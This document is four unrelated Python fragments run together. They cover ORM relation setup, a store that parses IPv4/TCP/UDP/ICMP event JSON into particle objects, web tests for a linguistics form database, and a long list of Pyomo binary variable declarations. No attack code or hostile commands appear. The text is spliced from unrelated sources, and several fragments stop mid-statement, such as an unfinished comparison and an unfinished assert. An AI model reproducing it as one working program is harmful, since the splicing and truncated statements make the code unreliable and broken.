related_model = get_related_model(related_app_name, related_model_name)
key_field = f"{field}_id"
key_fk_object = deepcopy(related_model._meta.pk)
key_fk_object.pk = False
key_fk_object.unique = False
key_fk_object.index = fk_object.index
key_fk_object.default = fk_object.default
key_fk_object.null = fk_object.null
key_fk_object.generated = fk_object.generated
key_fk_object.reference = fk_object
key_fk_object.description = fk_object.description
if fk_object.source_field:
key_fk_object.source_field = fk_object.source_field
fk_object.source_field = key_field
else:
fk_object.source_field = key_field
key_fk_object.source_field = key_field
model._meta.add_field(key_field, key_fk_object)
fk_object.model_class = related_model
backward_relation_name = fk_object.related_name
if backward_relation_name is not False:
if not backward_relation_name:
backward_relation_name = f"{model._meta.table}s"
if backward_relation_name in related_model._meta.fields:
raise ConfigurationError(
f'backward relation "{backward_relation_name}" duplicates in'
f" model {related_model_name}"
)
fk_relation = BackwardFKRelation(
model, f"{field}_id", fk_object.null, fk_object.description
)
related_model._meta.add_field(backward_relation_name, fk_relation)
for field in model._meta.o2o_fields:
o2o_object = cast(OneToOneFieldInstance, model._meta.fields_map[field])
reference = o2o_object.model_name
related_app_name, related_model_name = split_reference(reference)
related_model = get_related_model(related_app_name, related_model_name)
key_field = f"{field}_id"
key_o2o_object = deepcopy(related_model._meta.pk)
key_o2o_object.pk = o2o_object.pk
key_o2o_object.index = o2o_object.index
key_o2o_object.default = o2o_object.default
key_o2o_object.null = o2o_object.null
key_o2o_object.unique = o2o_object.unique
key_o2o_object.generated = o2o_object.generated
key_o2o_object.reference = o2o_object
key_o2o_object.description = o2o_object.description
if o2o_object.source_field:
key_o2o_object.source_field = o2o_object.source_field
o2o_object.source_field = key_field
else:
o2o_object.source_field = key_field
key_o2o_object.source_field = key_field
model._meta.add_field(key_field, key_o2o_object)
o2o_object.model_class = related_model
backward_relation_name = o2o_object.related_name
if backward_relation_name is not False:
if not backward_relation_name:
backward_relation_name = f"{model._meta.table}"
if backward_relation_name in related_model._meta.fields:
raise ConfigurationError(
f'backward relation "{backward_relation_name}" duplicates in'
f" model {related_model_name}"
)
o2o_relation = BackwardOneToOneRelation(
model, f"{field}_id", null=True, description=o2o_object.description
)
related_model._meta.add_field(backward_relation_name, o2o_relation)
if o2o_object.pk:
pk_attr_changed = True
model._meta.pk_attr = key_field
for field in list(model._meta.m2m_fields):
m2m_object = cast(ManyToManyFieldInstance, model._meta.fields_map[field])
if m2m_object._generated:
continue
backward_key = m2m_object.backward_key
if not backward_key:
backward_key = f"{model._meta.table}_id"
if backward_key == | |
particleID)
#
# -> This is the vectorSpaceGetAllSTIXParticle function that implements the get
# all STIX/Prediction particles that are in the vector space functionality.
#
def vectorSpaceGetAllSTIXParticle(self):
return self._vectorSpace.getAllSTIXParticles()
#
# -> This is the vectorSpaceGetAllEventParticle function that implements the get
# all event types particles that are in the vector space functionality.
#
def vectorSpaceGetAllEventParticle(self):
return self._vectorSpace.getAllEventParticles()
#
# -> This is the vectorSpaceGetParticleXYZ function that implements the get
# all event particle that is at location x,y,z in the vector space functionality.
#
def vectorSpaceGetParticleXYZ(self, x, y, z):
return self._vectorSpace.getParticleList(x, y, z)
#
# -> This is the vectorSpaceAddParticleList function that implements add partcile form the
# vector space functionality.
#
def vectorSpaceAddParticleList(self, x, y, z, particle):
return self._vectorSpace.addParticleList(x, y, z, particle)
#
# -> This is the vectorSpaceDelParticleList function that implements delete partcile form the
# vector space functionality.
#
def vectorSpaceDelParticleList(self, particle):
return self._vectorSpace.delParticleList(particle)
#
# -> This is the DBInsert function that implements the low-level insert event into database functionality.
#
def DBInsert(self, particletype, digest, partcile):
self._cacheDB[particletype][digest] = partcile
#self._graph.addV(particletype).property('particle',partcile)
#
# -> This is the setSubParticle function that implements the set partcile sub-type functionality.
#
def setSubParticle(self, particle_type, digest, sub_particle_id, sub_particle_type):
self._cacheDB[particle_type][digest].setSubType(sub_particle_type)
self._cacheDB[particle_type][digest].setSubTypeID(sub_particle_id)
return True
#
# -> This is the setSubParticle function that implements the set partcile super-type functionality.
#
def setSuperParticle(self, particle_type, digest, super_particle_id, super_particle_type):
self._cacheDB[particle_type][digest].setSuperType(super_particle_type)
self._cacheDB[particle_type][digest].setSuperTypeID(super_particle_id)
return True
#
# -> This is the insertEvent function that implements the insert event into database functionality.
#
def insertEvent(self, jdata, digest):
datetime = jdata['event']['_datetime']
sub_type = jdata['event']['_type']
eventParticle = EventParticle('event', digest, datetime, sub_type, jdata['event'])
xVector = random.randrange(-10, 10)
yVector = random.randrange(-10, 10)
zVector = random.randrange(-10, 10)
forceVector = random.randrange(0, 50)
eventParticle.setForce((xVector, yVector, zVector, forceVector))
self.DBInsert('event', digest, eventParticle)
return digest
#
#
#
# -> IPV4 JSON Event Data Structure is as follows:
# { "event" : { "_datetime" : "May 13 15:4:21", "_ident" : "17464748191557756261", "_type" : "ipv4",
# "ipv4": { "_datetime" : " May 13 15:4:21", "_ident" : "11957957371557756261", "_type" : "ipv4",
# "version" : "4", "ihl" : "5", "tos" : "0", "tlen" : "10240", "ident" : "0", "fragoff" : "64",
# "ttl" : "64", "protocol" : "6", "hcs" : "49329", "sourceip" : "192.168.1.100",
# "destinationip" : "172.16.31.10" } } }
#
def insertIPv4(self, jdata, digest):
datetime = jdata['ipv4']['_datetime']
version = jdata['ipv4']['version']
ihl = jdata['ipv4']['ihl']
tos = jdata['ipv4']['tos']
tlen = jdata['ipv4']['tlen']
ident = jdata['ipv4']['ident']
fragoff = jdata['ipv4']['fragoff']
ttl = jdata['ipv4']['ttl']
protocol = jdata['ipv4']['protocol']
hcs = jdata['ipv4']['hcs']
sourceip = jdata['ipv4']['sourceip']
destinationip = jdata['ipv4']['destinationip']
identifn = hashlib.sha224(str(digest+str(random.random())).encode('utf-8')).hexdigest()
#
self.DBInsert('ipv4', digest, IPV4Particle('ipv4', identifn, datetime, version, ihl, tos, tlen, ident,
fragoff, ttl, protocol, hcs, sourceip, destinationip))
#
self._vectorSpace.addParticleList(0,0,0,('ipv4', digest ))
#
if (DEBUG):
print('Identifier :-> IPV4/', digest)
print('Datatime :->', datetime)
print('IP Version :->', version)
print('Inet Header Len:->', ihl)
print('Type of Service:->', tos)
print('Total Length :->', tlen)
print('Ident :->', ident)
print('Frag Off Set :->', fragoff)
print('Time to Live :->', ttl)
print('Protocol :->', protocol)
print('Header CheckSum:->', hcs)
print('Source IP Addr :->', sourceip)
print('Dest IP Addr :->', destinationip)
print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#
return digest
#
# -> TCP JSON Event Data Structure is as follows:
# { "event" : { "_datetime" : "May 13 17:0:31", "_ident" : "16117398161557763231", "_type" : "ipv4",
# "ipv4": { "_datetime" : " May 13 17:0:31", "_ident" : "1523642541557763231", "_type" : "tcp",
# "version" : "4", "ihl" : "5", "tos" : "0", "tlen" : "16384", "ident" : "0", "fragoff" : "64",
# "ttl" : "255", "protocol" : "6", "hcs" : "39849", "sourceip" : "192.168.1.100",
# "destinationip" : "8.8.8.8", "tcp": { "_datetime" : " 13 17:0:31", "_ident" : "9855097541557763231",
# "_type" : "tcp", "sourport" : "46798", "destport" : "10146", "sequnum" : "3954678030",
# "acknum" : "0", "winsize" : "65535", "checksum" : "25923", "urgptr" : "0", "dataoffset" : "11",
# "ackflag" : "0", "cwrflag" : "0", "synflag" : "1", "pushflag" : "0", "ecnflag" : "0", "finflag" : "0",
# "rstflag" : "0", "urgflag" : "0" } } } }
#
def insertIPTCP(self, jdata, digest):
datetime = jdata['_datetime']
sourport = jdata['sourport']
destport = jdata['destport']
sequnum = jdata['sequnum']
acknum = jdata['acknum']
winsize = jdata['winsize']
checksum = jdata['checksum']
urgptr = jdata['urgptr']
dataoffset = jdata['dataoffset']
ackflag = jdata['ackflag']
cwrflag = jdata['cwrflag']
synflag = jdata['synflag']
pushflag = jdata['pushflag']
ecnflag= jdata['ecnflag']
finflag = jdata['finflag']
rstflag = jdata['rstflag']
urgflag = jdata['urgflag']
#
self.DBInsert('tcp', digest, TCPParticle('tcp', digest, datetime, sourport, destport, sequnum,
acknum, winsize, checksum, urgptr, dataoffset, ackflag,
cwrflag, synflag, pushflag, ecnflag, finflag, rstflag, urgflag))
#
self._vectorSpace.addParticleList(0,0,0,('tcp', digest ))
#
if (DEBUG):
print('Identifier :-> TCP/', digest)
print('Datatime :->', datetime)
print('Source Port :->', sourport)
print('Dest Port :->', destport)
print('Sequence Number:->', sequnum)
print('Ack Number :->', acknum)
print('Windows Size :->', winsize)
print('Check Sum :->', checksum)
print('Data Off Set :->', dataoffset)
print('Urgent Pointer :->', urgptr)
print('TCP Flags:')
print(' :-> [SYN:', synflag,']/[ACK:', ackflag, ']/[PSH:', pushflag, ']/[FIN:', finflag,']')
print(' :-> [URG:', urgflag,']/[CWR:', cwrflag, ']/[ECN:', ecnflag, ']/[RST:', rstflag,']')
print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#
return digest
#
# -> UDP JSON Event Data Structure is as follows:
# { "event" : { "_datetime" : "May 14 9:53:9", "_ident" : "7845588211557823989", "_type" :
# "ipv4", "ipv4": { "_datetime" : " 14 9:53:9", "_ident" : "5305119671557823989", "_type" : "udp",
# "version" : "4", "ihl" : "5", "tos" : "0", "tlen" : "61952", "ident" : "0", "fragoff" : "64",
# "ttl" : "64", "protocol" : "17", "hcs" : "17846", "sourceip" : "192.168.1.1",
# "destinationip" : "192.168.1.100", "udp": { "_datetime" : " 14 9:53:9", "_ident" : "21100106721557823989",
# "_type" : "udp", "checksum" : "38972", "length" : "56832", "sourport" : "13568",
# "destport" : "15855" } } } }
#
def insertIPUDP(self, jdata, digest):
datetime = jdata['_datetime']
sourport = jdata['sourport']
destport = jdata['destport']
checksum = jdata['checksum']
length = jdata['length']
#
self.DBInsert('udp', digest, UDPParticle('udp', digest, datetime, checksum, length, sourport, destport))
#
self._vectorSpace.addParticleList(0,0,0,('udp', digest ))
#
if (DEBUG):
print('Identifier :-> UPD/', digest)
print('Datatime :->', datetime)
print('Source Port :->', sourport)
print('Dest Port :->', destport)
print('Packet Checksum:->', checksum)
print('Packet Length :->', length)
print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#
return digest
#
# -> ICMP JSON Event Data Structure is as follows:
# { "event" : { "_datetime" : "May 13 9:25:7", "_ident" : "9849436581557735907", "_type" : "ipv4",
# "ipv4": { "_datetime" : " 13 9:25:7", "_ident" : "11441089301557735907", "_type" : "icmp",
# "version" : "4", "ihl" : "5", "tos" : "72", "tlen" : "21504", "ident" : "58470", "fragoff" : "0",
# "ttl" : "121", "protocol" : "1", "hcs" : "24840", "sourceip" : "8.8.8.8",
# "destinationip" : "192.168.1.100", "icmp": { "_datetime" : " 13 9:25:7",
# "_ident" : "4702112721557735907", "_type" : "icmp", "type" : "0", "code" : "0",
# "checksum" : "1308" } } } }
#
def insertIPICMP(self, jdata, digest):
datetime = jdata['_datetime']
ptype = jdata['type']
code = jdata['code']
checksum = jdata['checksum']
#
self.DBInsert('icmp', digest, ICMPParticle('icmp', digest, datetime, ptype, code, checksum))
#
self._vectorSpace.addParticleList(0,0,0,('icmp', digest ))
#
if (DEBUG):
print('Identifier :-> ICMP/', digest)
print('Datatime :->', datetime)
print('ICMP Type :->', ptype)
print('ICMP code :->', code)
print('ICMP Checksum :->', checksum)
print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#
return digest
#
# -> TCP/IP HTTP JSON Event Data Structure is as follows:
# { "event": { "_datetime": "May14 10:46:59", "_ident": "20919625371557827219", "_type": "ipv4",
# "ipv4": { "_datetime": " May 14 10:46:59", "_ident": "10120906751557827219", "_type": "tcp",
# "version": "4", "ihl": "5", "tos": "0", "tlen": "16384", "ident": "0", "fragoff": "64",
# "ttl": "255", "protocol": "6", "hcs": "39849", "sourceip": "192.168.1.100",
# "destinationip": "8.8.8.8", "tcp": { "_datetime": " May 14 10:46:59", "_ident": "21374904851557827219",
# "_type": "http", "sourport": "33518", "destport": "772", "sequnum": "1904020587", "acknum": "0",
# "winsize": "65535", "checksum": "52753", "urgptr": "0","dataoffset": "11", "ackflag": "0", "cwrflag": "0",
# "synflag": "1", "pushflag": "0", "ecnflag": "0", "finflag": "0", "rstflag": "0", "urgflag": | |
resp['tags']]
# Try to get the restricted tag as the viewer and expect to fail
extra_environ = {'test.authentication.id': contributor_id,
'test.application_settings': True}
response = self.app.get(url('form', id=restricted_form_id), headers=self.json_headers,
extra_environ=extra_environ, status=403)
resp = json.loads(response.body)
assert resp['error'] == u'You are not authorized to access this resource.'
@nottest
def test_normalization(self):
"""Tests that unicode input data are normalized and so too are search patterns."""
e_acute_combining = u'e\u0301' # LATIN SMALL LETTER E, COMBINING ACUTE ACCENT
e_acute_precomposed = u'\u00E9' # LATIN SMALL LETTER E WITH ACUTE
# Create a form with a unicode combining character in its transcription
params = self.form_create_params.copy()
params.update({
'transcription': e_acute_combining,
'translations': [{'transcription': u'test normalization', 'grammaticality': u''}]
})
params = json.dumps(params)
response = self.app.post(url('forms'), params, self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
combining_form_id = resp['id']
combining_transcription = resp['transcription']
# Create a form with a unicode precomposed character in its transcription
params = self.form_create_params.copy()
params.update({
'transcription': e_acute_precomposed,
'translations': [{'transcription': u'test normalization', 'grammaticality': u''}]
})
params = json.dumps(params)
response = self.app.post(url('forms'), params, self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
precomposed_form_id = resp['id']
precomposed_transcription = resp['transcription']
assert combining_transcription == precomposed_transcription # h.normalize converts these both to u'e\u0301'
# Now search for the precomposed character and expect to find two matches
json_query = json.dumps(
{'query': {'filter': ['Form', 'transcription', 'like', u'%\u00E9%']}})
response = self.app.request(url('forms'), method='SEARCH',
body=json_query, headers=self.json_headers, environ=self.extra_environ_admin)
resp = json.loads(response.body)
assert len(resp) == 2
assert sorted([f['id'] for f in resp]) == sorted([combining_form_id, precomposed_form_id])
# Search for the e + combining accute and expect to find the same two matches
json_query = json.dumps(
{'query': {'filter': ['Form', 'transcription', 'like', u'%e\u0301%']}})
response = self.app.request(url('forms'), method='SEARCH',
body=json_query, headers=self.json_headers, environ=self.extra_environ_admin)
resp = json.loads(response.body)
assert len(resp) == 2
assert sorted([f['id'] for f in resp]) == sorted([combining_form_id, precomposed_form_id])
@nottest
def test_lexical_percolation(self):
"""Tests that creation, updating and deletion of a lexical forms percolates up to the phrasal forms containing them.
"""
# First create a couple of syntactic categories and the application settings
Agr = model.SyntacticCategory()
Agr.name = u'Agr'
N = h.generate_n_syntactic_category()
Num = h.generate_num_syntactic_category()
application_settings = h.generate_default_application_settings()
Session.add_all([N, Num, application_settings, Agr])
Session.commit()
NId = N.id
NumId = Num.id
AgrId = Agr.id
extra_environ = {'test.authentication.role': u'administrator',
'test.application_settings': True}
# Create two forms with morphological analyses.
params = self.form_create_params.copy()
params.update({
'transcription': u'abc',
'morpheme_break': u'a-b-c',
'morpheme_gloss': u'1-2-3',
'translations': [{'transcription': u'123', 'grammaticality': u''}]
})
params = json.dumps(params)
response = self.app.post(url('forms'), params, self.json_headers, extra_environ)
params = self.form_create_params.copy()
params.update({
'transcription': u'xyz',
'morpheme_break': u'x-y-z',
'morpheme_gloss': u'7-8-9',
'translations': [{'transcription': u'789', 'grammaticality': u''}]
})
params = json.dumps(params)
response = self.app.post(url('forms'), params, self.json_headers, extra_environ)
xyz_id = json.loads(response.body)['id']
# GET the forms and confirm that the morpheme_break_ids values are "empty"
response = self.app.get(url('forms'), headers=self.json_headers,
extra_environ=self.extra_environ_admin)
resp = json.loads(response.body)
phrasal_ids = [f['id'] for f in resp]
assert len(resp) == 2
assert [f['morpheme_break_ids'] for f in resp] == [[[[], [], []]], [[[], [], []]]]
assert [f['morpheme_gloss_ids'] for f in resp] == [[[[], [], []]], [[[], [], []]]]
assert [f['syntactic_category_string'] for f in resp] == [u'?-?-?', u'?-?-?']
# Now add the implicit lexical items for the two forms just entered and
# expect the morpheme_break_ids (etc.) fields of the two phrasal forms to
# have changed.
sleep(1)
x_params = self.form_create_params.copy()
x_params.update({
'transcription': u'x',
'morpheme_break': u'x',
'morpheme_gloss': u'7',
'translations': [{'transcription': u'7', 'grammaticality': u''}],
'syntactic_category': NumId
})
x_params = json.dumps(x_params)
response = self.app.post(url('forms'), x_params, self.json_headers, extra_environ)
x_resp = json.loads(response.body)
x_id = x_resp['id']
assert x_resp['morpheme_break_ids'][0][0][0][1] == u'7'
assert x_resp['morpheme_break_ids'][0][0][0][2] == u'Num'
assert x_resp['morpheme_gloss_ids'][0][0][0][1] == u'x'
assert x_resp['morpheme_gloss_ids'][0][0][0][2] == u'Num'
assert x_resp['syntactic_category_string'] == u'Num'
assert x_resp['break_gloss_category'] == u'x|7|Num'
y_params = self.form_create_params.copy()
y_params.update({
'transcription': u'y',
'morpheme_break': u'y',
'morpheme_gloss': u'8',
'translations': [{'transcription': u'8', 'grammaticality': u''}],
'syntactic_category': NId
})
y_params = json.dumps(y_params)
response = self.app.post(url('forms'), y_params, self.json_headers, extra_environ)
y_id = json.loads(response.body)['id']
z_params = self.form_create_params.copy()
z_params.update({
'transcription': u'z',
'morpheme_break': u'z',
'morpheme_gloss': u'9',
'translations': [{'transcription': u'9', 'grammaticality': u''}],
'syntactic_category': NumId
})
z_params = json.dumps(z_params)
response = self.app.post(url('forms'), z_params, self.json_headers, extra_environ)
z_id = json.loads(response.body)['id']
a_params = self.form_create_params.copy()
a_params.update({
'transcription': u'a',
'morpheme_break': u'a',
'morpheme_gloss': u'1',
'translations': [{'transcription': u'1', 'grammaticality': u''}],
'syntactic_category': NumId
})
a_params = json.dumps(a_params)
response = self.app.post(url('forms'), a_params, self.json_headers, extra_environ)
b_params = self.form_create_params.copy()
b_params.update({
'transcription': u'b',
'morpheme_break': u'b',
'morpheme_gloss': u'2',
'translations': [{'transcription': u'2', 'grammaticality': u''}],
'syntactic_category': NId
})
b_params = json.dumps(b_params)
response = self.app.post(url('forms'), b_params, self.json_headers, extra_environ)
c_params = self.form_create_params.copy()
c_params.update({
'transcription': u'c',
'morpheme_break': u'c',
'morpheme_gloss': u'3',
'translations': [{'transcription': u'3', 'grammaticality': u''}],
'syntactic_category': NumId
})
c_params = json.dumps(c_params)
response = self.app.post(url('forms'), c_params, self.json_headers, extra_environ)
# Use search to get our two original morphologically complex forms
json_query = json.dumps({'query': {'filter':
['Form', 'id', 'in', phrasal_ids]}})
response = self.app.post(url('/forms/search'), json_query,
self.json_headers, self.extra_environ_admin)
resp2 = json.loads(response.body)
assert [f['id'] for f in resp] == [f['id'] for f in resp2]
assert [f['datetime_modified'] for f in resp2] != [f['datetime_modified'] for f in resp]
assert resp2[0]['morpheme_break_ids'][0][0][0][1] == u'1'
assert resp2[0]['morpheme_break_ids'][0][0][0][2] == u'Num'
assert resp2[0]['morpheme_break_ids'][0][1][0][1] == u'2'
assert resp2[0]['morpheme_break_ids'][0][1][0][2] == u'N'
assert resp2[0]['morpheme_break_ids'][0][2][0][1] == u'3'
assert resp2[0]['morpheme_break_ids'][0][2][0][2] == u'Num'
assert resp2[0]['morpheme_gloss_ids'][0][0][0][1] == u'a'
assert resp2[0]['morpheme_gloss_ids'][0][0][0][2] == u'Num'
assert resp2[0]['morpheme_gloss_ids'][0][1][0][1] == u'b'
assert resp2[0]['morpheme_gloss_ids'][0][1][0][2] == u'N'
assert resp2[0]['morpheme_gloss_ids'][0][2][0][1] == u'c'
assert resp2[0]['morpheme_gloss_ids'][0][2][0][2] == u'Num'
assert resp2[0]['syntactic_category_string'] == u'Num-N-Num'
assert resp2[0]['break_gloss_category'] == u'a|1|Num-b|2|N-c|3|Num'
assert resp2[1]['morpheme_break_ids'][0][0][0][1] == u'7'
assert resp2[1]['morpheme_break_ids'][0][0][0][2] == u'Num'
assert resp2[1]['morpheme_break_ids'][0][1][0][1] == u'8'
assert resp2[1]['morpheme_break_ids'][0][1][0][2] == u'N'
assert resp2[1]['morpheme_break_ids'][0][2][0][1] == u'9'
assert resp2[1]['morpheme_break_ids'][0][2][0][2] == u'Num'
assert resp2[1]['morpheme_gloss_ids'][0][0][0][1] == u'x'
assert resp2[1]['morpheme_gloss_ids'][0][0][0][2] == u'Num'
assert resp2[1]['morpheme_gloss_ids'][0][1][0][1] == u'y'
assert resp2[1]['morpheme_gloss_ids'][0][1][0][2] == u'N'
assert resp2[1]['morpheme_gloss_ids'][0][2][0][1] == u'z'
assert resp2[1]['morpheme_gloss_ids'][0][2][0][2] == u'Num'
assert resp2[1]['syntactic_category_string'] == u'Num-N-Num'
assert resp2[1]['break_gloss_category'] == u'x|7|Num-y|8|N-z|9|Num'
form_backups = Session.query(model.FormBackup).all()
assert len(form_backups) == 6 # each lexical item creation updates one phrasal form
# Now update the lexical items and expect updates in the phrasal ones too
# Update the morpheme_break value of the lexical form 'x' and expect the
# phrasal form 'xyz' to get updated too.
form_backup_count = Session.query(model.FormBackup).count()
x_params = json.loads(x_params)
x_params['morpheme_break'] = u'xx'
x_params = json.dumps(x_params)
response = self.app.put(url('form', id=x_id), x_params, self.json_headers, extra_environ)
xyz_phrase = Session.query(model.Form).get(xyz_id)
xyz_morpheme_gloss_ids = json.loads(xyz_phrase.morpheme_gloss_ids)
xyz_morpheme_break_ids = json.loads(xyz_phrase.morpheme_break_ids)
new_form_backup_count = Session.query(model.FormBackup).count()
assert new_form_backup_count == form_backup_count + 2 # 'x' and 'xyz' are both updated
assert xyz_morpheme_gloss_ids[0][0][0][1] == u'xx' # The 'x' morpheme is still glossed as '7'
assert xyz_morpheme_break_ids[0][0] == [] # No more 'x' morpheme so w1, m1 is empty
assert xyz_phrase.break_gloss_category == u'x|7|Num-y|8|N-z|9|Num' # Stays unchanged
assert xyz_phrase.syntactic_category_string == u'Num-N-Num' # " "
# Update the morpheme_gloss value of the lexical form 'y' and expect the
# phrasal form 'xyz' to get updated too.
y_params = json.loads(y_params)
y_params['morpheme_gloss'] = u'88'
y_params = json.dumps(y_params)
response = self.app.put(url('form', id=y_id), y_params, self.json_headers, extra_environ)
xyz_phrase = Session.query(model.Form).get(xyz_id)
xyz_morpheme_gloss_ids = json.loads(xyz_phrase.morpheme_gloss_ids)
xyz_morpheme_break_ids = json.loads(xyz_phrase.morpheme_break_ids)
form_backup_count = new_form_backup_count
new_form_backup_count = Session.query(model.FormBackup).count()
assert new_form_backup_count == form_backup_count + 2
assert xyz_morpheme_break_ids[0][1][0][1] == u'88' # The 'y' morpheme is now glossed as '88'
assert xyz_morpheme_gloss_ids[0][1] == [] # No more '8' morpheme so w1, m1 is empty
assert xyz_phrase.break_gloss_category == u'x|7|Num-y|8|N-z|9|Num' # Stays unchanged
assert xyz_phrase.syntactic_category_string == u'Num-N-Num' # " "
# Update the syntactic category of the lexical form 'z' and expect the
# phrasal form 'xyz' to get updated too.
z_params = json.loads(z_params)
z_params['syntactic_category'] = NId
z_params = json.dumps(z_params)
response = self.app.put(url('form', id=z_id), z_params, self.json_headers, extra_environ)
xyz_phrase = Session.query(model.Form).get(xyz_id)
xyz_morpheme_gloss_ids = json.loads(xyz_phrase.morpheme_gloss_ids)
xyz_morpheme_break_ids = json.loads(xyz_phrase.morpheme_break_ids)
form_backup_count = new_form_backup_count
new_form_backup_count = Session.query(model.FormBackup).count()
assert new_form_backup_count == form_backup_count + 2
assert xyz_morpheme_break_ids[0][2][0][2] == u'N' # The 'z' morpheme now has 'N' for category
assert xyz_morpheme_gloss_ids[0][2][0][2] == u'N' # redundant, I know
assert xyz_phrase.break_gloss_category == u'x|7|Num-y|8|N-z|9|N'
assert xyz_phrase.syntactic_category_string == u'Num-N-N'
# Save these values for the next test:
xyz_phrase_morpheme_break_ids = xyz_phrase.morpheme_break_ids
xyz_phrase_morpheme_gloss_ids = xyz_phrase.morpheme_gloss_ids
xyz_phrase_break_gloss_category = xyz_phrase.break_gloss_category
xyz_phrase_syntactic_category_string = xyz_phrase.syntactic_category_string
# Update the lexical form 'z' in a way that is irrelevant to the phrasal
# form 'xyz'; expect 'xyz' to be unaffected.
z_params = json.loads(z_params)
z_params['transcription'] = u'zZz'
z_params['translations'] = [{'transcription': u'999', 'grammaticality': u''}]
z_params = json.dumps(z_params)
response = self.app.put(url('form', id=z_id), z_params, self.json_headers, extra_environ)
new_xyz_phrase = Session.query(model.Form).get(xyz_id)
form_backup_count = new_form_backup_count
new_form_backup_count = Session.query(model.FormBackup).count()
assert new_form_backup_count == form_backup_count + 1 # only the lexical item has been updated
assert xyz_phrase_morpheme_break_ids == new_xyz_phrase.morpheme_break_ids
assert xyz_phrase_morpheme_gloss_ids == new_xyz_phrase.morpheme_gloss_ids
assert xyz_phrase_break_gloss_category == new_xyz_phrase.break_gloss_category
assert xyz_phrase_syntactic_category_string | |
= Var(within=Binary,bounds=(0,1),initialize=0)
m.b1878 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1879 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1880 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1881 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1882 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1883 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1884 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1885 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1886 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1887 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1888 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1889 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1890 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1891 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1892 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1893 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1894 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1895 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1896 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1897 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1898 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1899 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1900 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1901 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1902 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1903 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1904 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1905 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1906 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1907 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1908 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1909 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1910 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1911 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1912 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1913 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1914 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1915 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1916 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1917 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1918 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1919 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1920 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1921 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1922 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1923 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1924 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1925 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1926 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1927 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1928 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1929 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1930 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1931 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1932 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1933 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1934 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1935 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1936 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1937 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1938 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1939 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1940 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1941 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1942 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1943 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1944 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1945 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1946 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1947 = Var(within=Binary,bounds=(0,1),initialize=0)
